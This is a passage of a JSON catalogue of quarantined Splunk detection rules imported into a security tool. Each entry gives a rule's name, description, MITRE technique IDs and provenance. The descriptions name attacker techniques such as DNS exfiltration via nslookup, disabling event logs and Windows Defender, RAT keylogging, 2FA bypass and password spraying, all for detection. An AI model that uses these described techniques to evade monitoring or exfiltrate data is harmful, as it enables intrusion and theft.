"detections/splunk-imports/_quarantine/linux-magic-sysrq-key-abuse.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "22c03600-f84a-47fa-abaa-ffbe3e72c782", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_magic_sysrq_key_abuse.yml" } }, { "id": "splunk-security-content-22cc7a62-3884-48c4-82da-592b8199b72f", "type": "detection", "name": "ASL AWS Create Policy Version to allow all resources", "description": "The following analytic identifies the creation of a new AWS IAM policy version that allows access to all resources. It detects this activity by analyzing AWS CloudTrail logs for the CreatePolicyVersion event with a policy document that grants broad permissions. This behavior is significant because it violates the principle of least privilege, potentially exposing the environment to misuse or abuse. 
If confirmed malicious, an attacker could gain extensive access to AWS resources, leading to unauthorized actions, data exfiltration, or further compromise of the AWS environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1078.004" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/asl-aws-create-policy-version-to-allow-all-resources.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "22cc7a62-3884-48c4-82da-592b8199b72f", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/asl_aws_create_policy_version_to_allow_all_resources.yml" } }, { "id": "splunk-security-content-22d3b118-04df-11ec-8fa3-acde48001122", "type": "detection", "name": "GetWmiObject DS User with PowerShell", "description": "The following analytic detects the execution of `powershell.exe` with command-line arguments used to query domain users via the `Get-WmiObject` cmdlet and `-class ds_user` parameter.\nThis detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names and command-line executions.\nThis activity is significant as it indicates potential reconnaissance efforts by adversaries to enumerate domain users, which is a common step in Active Directory Discovery.\nIf confirmed malicious, this could lead to further attacks, including privilege escalation and lateral movement within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ 
"T1087.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/getwmiobject-ds-user-with-powershell.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "22d3b118-04df-11ec-8fa3-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/getwmiobject_ds_user_with_powershell.yml" } }, { "id": "splunk-security-content-23150a40-9301-4195-b802-5bb4f43067fb", "type": "detection", "name": "Windows DisableAntiSpyware Registry", "description": "The following analytic detects the modification of the Windows Registry key \"DisableAntiSpyware\" being set to disable. This detection leverages data from the Endpoint.Registry datamodel, specifically looking for the registry value name \"DisableAntiSpyware\" with a value of \"0x00000001\". This activity is significant as it is commonly associated with Ryuk ransomware infections, indicating potential malicious intent to disable Windows Defender. 
If confirmed malicious, this action could allow attackers to disable critical security defenses, facilitating further malicious activities such as data encryption, exfiltration, or additional system compromise.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-disableantispyware-registry.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "23150a40-9301-4195-b802-5bb4f43067fb", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_disableantispyware_registry.yml" } }, { "id": "splunk-security-content-23587b6a-c479-11eb-b671-acde48001122", "type": "detection", "name": "Excessive distinct processes from Windows Temp", "description": "The following analytic identifies an excessive number of distinct processes executing from the Windows\\Temp directory. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process paths and counts within a 20-minute window. This behavior is significant as it often indicates the presence of post-exploit frameworks like Koadic and Meterpreter, which use this technique to execute malicious actions. 
If confirmed malicious, this activity could allow attackers to execute arbitrary code, escalate privileges, and maintain persistence within the environment, posing a severe threat to system integrity and security.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/excessive-distinct-processes-from-windows-temp.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "23587b6a-c479-11eb-b671-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/excessive_distinct_processes_from_windows_temp.yml" } }, { "id": "splunk-security-content-236e7c8e-c9d9-11eb-a824-acde48001122", "type": "detection", "name": "Disable Logs Using WevtUtil", "description": "The following analytic detects the execution of \"wevtutil.exe\" with parameters to disable event logs. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names and command-line arguments. This activity is significant because disabling event logs is a common tactic used by ransomware to evade detection and hinder forensic investigations. 
If confirmed malicious, this action could allow attackers to operate undetected, making it difficult to trace their activities and respond effectively to the incident.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1070.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/disable-logs-using-wevtutil.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "236e7c8e-c9d9-11eb-a824-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/disable_logs_using_wevtutil.yml" } }, { "id": "splunk-security-content-237016fa-d8e6-47b4-80f9-70c4d42c72c0", "type": "detection", "name": "Windows Process Execution From ProgramData", "description": "The following analytic identifies processes running from file paths within\nthe ProgramData directory, a common location abused by adversaries for executing\nmalicious code while evading detection. Threat actors often drop and execute payloads\nfrom this directory to bypass security controls, as it typically has write permissions\nfor standard users. 
While this behavior can indicate malware execution or persistence\ntechniques, it is important to note that some legitimate software, installers, and\nupdate mechanisms also run from ProgramData, leading to potential false positives.\nSecurity teams should validate detections by correlating with other indicators,\nsuch as unusual parent processes, unsigned binaries, or anomalous network activity.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1036.005" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-process-execution-from-programdata.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "237016fa-d8e6-47b4-80f9-70c4d42c72c0", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_process_execution_from_programdata.yml" } }, { "id": "splunk-security-content-238f3a07-8440-480b-b26f-462f41d9a47c", "type": "detection", "name": "Windows Masquerading Msdtc Process", "description": "The following analytic identifies the execution of msdtc.exe with specific command-line parameters (-a or -b), which are indicative of the PlugX malware. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names and command-line arguments. This activity is significant because PlugX uses these parameters to masquerade its malicious operations within legitimate processes, making it harder to detect. 
If confirmed malicious, this behavior could allow attackers to gain unauthorized access, exfiltrate data, and conduct espionage, severely compromising the affected system.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1036" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-masquerading-msdtc-process.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "238f3a07-8440-480b-b26f-462f41d9a47c", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_masquerading_msdtc_process.yml" } }, { "id": "splunk-security-content-23add2a8-ea22-4fd4-8bc0-8c0b822373a1", "type": "detection", "name": "Windows Group Policy Object Created", "description": "The following analytic detects the creation of a new Group Policy Object (GPO) by leveraging Event IDs 5136 and 5137. This detection uses directory service change events to identify when a new GPO is created. Monitoring GPO creation is crucial as adversaries can exploit GPOs to escalate privileges or deploy malware across an Active Directory network. 
If confirmed malicious, this activity could allow attackers to control system configurations, deploy ransomware, or propagate malware, leading to widespread compromise and significant operational disruption.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1078.002", "T1484.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-group-policy-object-created.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "23add2a8-ea22-4fd4-8bc0-8c0b822373a1", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_group_policy_object_created.yml" } }, { "id": "splunk-security-content-23e5b797-378d-45d6-ab3e-d034ca12a99b", "type": "detection", "name": "LLM Model File Creation", "description": "Detects the creation of Large Language Model (LLM) files on Windows endpoints by monitoring file creation events for specific model file formats and extensions commonly used by local AI frameworks.\nThis detection identifies potential shadow AI deployments, unauthorized model downloads, and rogue LLM infrastructure by detecting file creation patterns associated with quantized models (.gguf, .ggml), safetensors model format files, and Ollama Modelfiles.\nThese file types are characteristic of local inference frameworks such as Ollama, llama.cpp, GPT4All, LM Studio, and similar tools that enable running LLMs locally without cloud dependencies.\nOrganizations can use this detection to identify potential data exfiltration risks, policy violations related to unapproved AI usage, 
and security blind spots created by decentralized AI deployments that bypass enterprise governance and monitoring.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1543" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/llm-model-file-creation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "23e5b797-378d-45d6-ab3e-d034ca12a99b", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/llm_model_file_creation.yml" } }, { "id": "splunk-security-content-23fb6787-255f-4d5b-9a66-9fd7504032b5", "type": "detection", "name": "Windows Disable Windows Event Logging Disable HTTP Logging", "description": "The following analytic detects the use of AppCmd.exe to disable HTTP logging on IIS servers. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process execution events where AppCmd.exe is used with specific parameters to alter logging settings. This activity is significant because disabling HTTP logging can help adversaries hide their tracks and avoid detection by removing evidence of their actions. 
If confirmed malicious, this could allow attackers to operate undetected, making it difficult to trace their activities and respond to the intrusion effectively.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1505.004", "T1562.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-disable-windows-event-logging-disable-http-logging.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "23fb6787-255f-4d5b-9a66-9fd7504032b5", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_disable_windows_event_logging_disable_http_logging.yml" } }, { "id": "splunk-security-content-2418780f-7c3e-4c45-b8b4-996ea850cd49", "type": "detection", "name": "Windows System Discovery Using ldap Nslookup", "description": "The following analytic detects the execution of nslookup.exe to query domain information using LDAP. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names and command-line arguments. This activity is significant as nslookup.exe can be abused by malware like Qakbot to gather critical domain details, such as SRV records and server names. 
If confirmed malicious, this behavior could allow attackers to map the network, identify key servers, and plan further attacks, potentially leading to data exfiltration or lateral movement within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1033" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-system-discovery-using-ldap-nslookup.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "2418780f-7c3e-4c45-b8b4-996ea850cd49", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_system_discovery_using_ldap_nslookup.yml" } }, { "id": "splunk-security-content-242e4d30-cb59-4051-b0cf-58895e218f40", "type": "detection", "name": "O365 User Consent Blocked for Risky Application", "description": "The following analytic identifies instances where Office 365 has blocked a user's attempt to grant consent to an application deemed risky or potentially malicious. This detection leverages O365 audit logs, specifically focusing on failed user consent actions due to system-driven blocks. Monitoring these blocked consent attempts is crucial as it highlights potential threats early on, indicating that a user might be targeted or that malicious applications are attempting to infiltrate the organization. 
If confirmed malicious, this activity suggests that O365's security measures successfully prevented a harmful application from accessing organizational data, warranting immediate investigation.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1528" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/o365-user-consent-blocked-for-risky-application.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "242e4d30-cb59-4051-b0cf-58895e218f40", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/o365_user_consent_blocked_for_risky_application.yml" } }, { "id": "splunk-security-content-244a77bb-3b2a-46f1-bf2c-b4f7cd29276d", "type": "detection", "name": "Cisco Secure Firewall - Possibly Compromised Host", "description": "The following analytic highlights high-impact intrusion events assigned by Cisco Secure Firewall.\nThis detection leverages Cisco Secure Firewall Threat Defense logs and specifically the IntrusionEvent event type and `Impact` field assigned by Cisco Secure Firewall looking for an impact score of 1 or 2. 
If confirmed malicious, this may indicate a potentially compromised host.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1203", "T1059", "T1587.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/cisco-secure-firewall-possibly-compromised-host.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "244a77bb-3b2a-46f1-bf2c-b4f7cd29276d", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/network/cisco_secure_firewall___possibly_compromised_host.yml" } }, { "id": "splunk-security-content-2452e632-9e0d-11eb-bacd-acde48001122", "type": "detection", "name": "DNS Exfiltration Using Nslookup App", "description": "The following analytic identifies potential DNS exfiltration using the nslookup application. It detects specific command-line parameters such as query type (TXT, A, AAAA) and retry options, which are commonly used by attackers to exfiltrate data. The detection leverages Endpoint Detection and Response (EDR) telemetry, focusing on process execution logs. This activity is significant as it may indicate an attempt to communicate with a Command and Control (C2) server or exfiltrate sensitive data. 
If confirmed malicious, this could lead to data breaches and unauthorized access to critical information.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1048" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/dns-exfiltration-using-nslookup-app.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "2452e632-9e0d-11eb-bacd-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/dns_exfiltration_using_nslookup_app.yml" } }, { "id": "splunk-security-content-24869767-8579-485d-9a4f-d9ddfd8f0cac", "type": "detection", "name": "Process Execution via WMI", "description": "The following analytic detects the execution of a process by `WmiPrvSE.exe`, indicating potential use of WMI (Windows Management Instrumentation) for process creation. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on process and parent process relationships. This activity is significant as WMI can be used for lateral movement, remote code execution, or persistence by attackers. 
If confirmed malicious, this could allow an attacker to execute arbitrary commands or scripts, potentially leading to further compromise of the affected system or network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1047" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/process-execution-via-wmi.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "24869767-8579-485d-9a4f-d9ddfd8f0cac", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/process_execution_via_wmi.yml" } }, { "id": "splunk-security-content-24b2c2e3-2ff7-4a23-b814-87f8a62028cd", "type": "detection", "name": "Cisco Secure Firewall - Binary File Type Download", "description": "The following analytic detects file downloads involving executable, archive, or scripting-related file types that are commonly used in malware delivery.\nThese file types include formats like PE executables, shell scripts, autorun files, installers, and known testing samples such as EICAR.\nThis detection leverages Cisco Secure Firewall Threat Defense logs and enriches the results using a filetype lookup to provide context.\nIf confirmed malicious, these downloads could indicate the initial infection vector, malware staging, or scripting abuse.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1203", "T1059" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", 
"enabled": false, "path": "detections/splunk-imports/_quarantine/cisco-secure-firewall-binary-file-type-download.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "24b2c2e3-2ff7-4a23-b814-87f8a62028cd", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/network/cisco_secure_firewall___binary_file_type_download.yml" } }, { "id": "splunk-security-content-25212358-948e-11ec-ad47-acde48001122", "type": "detection", "name": "Windows Service Creation Using Registry Entry", "description": "The following analytic detects the modification of registry keys that define Windows services using reg.exe. This detection leverages Splunk to search for specific keywords in the registry path, value name, and value data fields. This activity is significant because it indicates potential unauthorized changes to service configurations, a common persistence technique used by attackers. 
If confirmed malicious, this could allow an attacker to maintain access, escalate privileges, or move laterally within the network, leading to data theft, ransomware, or other damaging outcomes.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1574.011" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-service-creation-using-registry-entry.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "25212358-948e-11ec-ad47-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_service_creation_using_registry_entry.yml" } }, { "id": "splunk-security-content-2593f641-6192-4f3d-b96c-2bd1c706215f", "type": "detection", "name": "Cisco Duo Policy Allow Network Bypass 2FA", "description": "The following analytic detects when a Duo policy is created or updated to allow network-based bypass of two-factor authentication (2FA).\nIt identifies this behavior by searching Duo administrator logs for policy creation or update actions where the networks_allow field is present,\nindicating that specific networks have been permitted to bypass 2FA requirements. This is achieved by parsing the event description and\nfiltering for relevant policy changes, then aggregating the results by user and administrator details. 
Detecting this behavior is critical\nfor a Security Operations Center (SOC) because allowing network-based 2FA bypass can significantly weaken authentication controls, potentially\nenabling unauthorized access if a trusted network is compromised or misconfigured. Attackers or malicious insiders may exploit this policy\nchange to circumvent 2FA protections, increasing the risk of account takeover and lateral movement within the environment. Prompt detection\nenables SOC analysts to investigate and respond to potentially risky policy modifications before they can be leveraged for malicious purposes.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1556" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/cisco-duo-policy-allow-network-bypass-2fa.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "2593f641-6192-4f3d-b96c-2bd1c706215f", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/application/cisco_duo_policy_allow_network_bypass_2fa.yml" } }, { "id": "splunk-security-content-25ae862a-1ac3-11ec-94a1-acde48001122", "type": "detection", "name": "Remcos RAT File Creation in Remcos Folder", "description": "The following analytic detects the creation of files in the Remcos folder within the AppData directory, specifically targeting keylog and clipboard log files. 
It leverages the Endpoint.Filesystem data model to identify .dat files created in paths containing \"remcos.\" This activity is significant as it indicates the presence of the Remcos RAT, which performs keylogging, clipboard capturing, and audio recording. If confirmed malicious, this could lead to unauthorized data exfiltration and extensive surveillance capabilities for the attacker.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1113" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/remcos-rat-file-creation-in-remcos-folder.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "25ae862a-1ac3-11ec-94a1-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/remcos_rat_file_creation_in_remcos_folder.yml" } }, { "id": "splunk-security-content-25bdb6cb-2e49-4d34-a93c-d6c567c122fe", "type": "detection", "name": "Windows Unusual Count Of Users Failed To Authenticate From Process", "description": "The following analytic identifies a source process failing to authenticate multiple users, potentially indicating a Password Spraying attack. It leverages Windows Event 4625, which logs failed logon attempts, and uses statistical analysis to detect anomalies. This activity is significant as it may represent an adversary attempting to gain initial access or elevate privileges within an Active Directory environment. 
If confirmed malicious, the attacker could compromise multiple accounts, leading to unauthorized access, data exfiltration, or further lateral movement within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1110.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-unusual-count-of-users-failed-to-authenticate-from-process.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "25bdb6cb-2e49-4d34-a93c-d6c567c122fe", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_unusual_count_of_users_failed_to_authenticate_from_process.yml" } }, { "id": "splunk-security-content-25ca9594-7a0d-4a95-a5e5-3228d7398ec8", "type": "detection", "name": "Kubernetes Process with Anomalous Resource Utilisation", "description": "The following analytic identifies high resource utilization anomalies in Kubernetes processes. It leverages process metrics from an OTEL collector and hostmetrics receiver, fetched via the Splunk Infrastructure Monitoring Add-on. The detection uses a lookup table with average and standard deviation values to spot anomalies. This activity is significant as high resource utilization can indicate security threats like cryptojacking, unauthorized data exfiltration, or compromised containers. 
If confirmed malicious, such anomalies can disrupt services, exhaust resources, increase costs, and allow attackers to evade detection or maintain access.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1204" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/kubernetes-process-with-anomalous-resource-utilisation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "25ca9594-7a0d-4a95-a5e5-3228d7398ec8", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/kubernetes_process_with_anomalous_resource_utilisation.yml" } }, { "id": "splunk-security-content-2628b087-4189-403f-9044-87403f777a1b", "type": "detection", "name": "Azure AD New MFA Method Registered For User", "description": "The following analytic detects the registration of a new Multi-Factor Authentication (MFA) method for an Azure AD account. It leverages Azure AD AuditLogs to identify when a user registers new security information. This activity is significant because adversaries who gain unauthorized access to an account may add their own MFA method to maintain persistence. 
If confirmed malicious, this could allow attackers to bypass existing security controls, maintain long-term access, and potentially escalate their privileges within the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1556.006" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/azure-ad-new-mfa-method-registered-for-user.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "2628b087-4189-403f-9044-87403f777a1b", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/azure_ad_new_mfa_method_registered_for_user.yml" } }, { "id": "splunk-security-content-264ea131-ab1f-41b8-90e0-33ad1a1888ea", "type": "detection", "name": "Azure AD Multiple Failed MFA Requests For User", "description": "The following analytic identifies multiple failed multi-factor authentication (MFA) requests for a single user within an Azure AD tenant. It leverages Azure AD Sign-in Logs, specifically error code 500121, to detect more than 10 failed MFA attempts within 10 minutes. This behavior is significant as it may indicate an adversary attempting to bypass MFA by bombarding the user with repeated authentication prompts. 
If confirmed malicious, this activity could lead to unauthorized access, allowing attackers to compromise user accounts and potentially escalate their privileges within the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1078.004", "T1586.003", "T1621" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/azure-ad-multiple-failed-mfa-requests-for-user.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "264ea131-ab1f-41b8-90e0-33ad1a1888ea", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/azure_ad_multiple_failed_mfa_requests_for_user.yml" } }, { "id": "splunk-security-content-26f02e96-c300-11eb-b611-acde48001122", "type": "detection", "name": "Detect AzureHound Command-Line Arguments", "description": "The following analytic detects the execution of the `Invoke-AzureHound` command-line argument, commonly used by the AzureHound tool. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names and command-line executions. This activity is significant because AzureHound is often used for reconnaissance in Azure environments, potentially exposing sensitive information. 
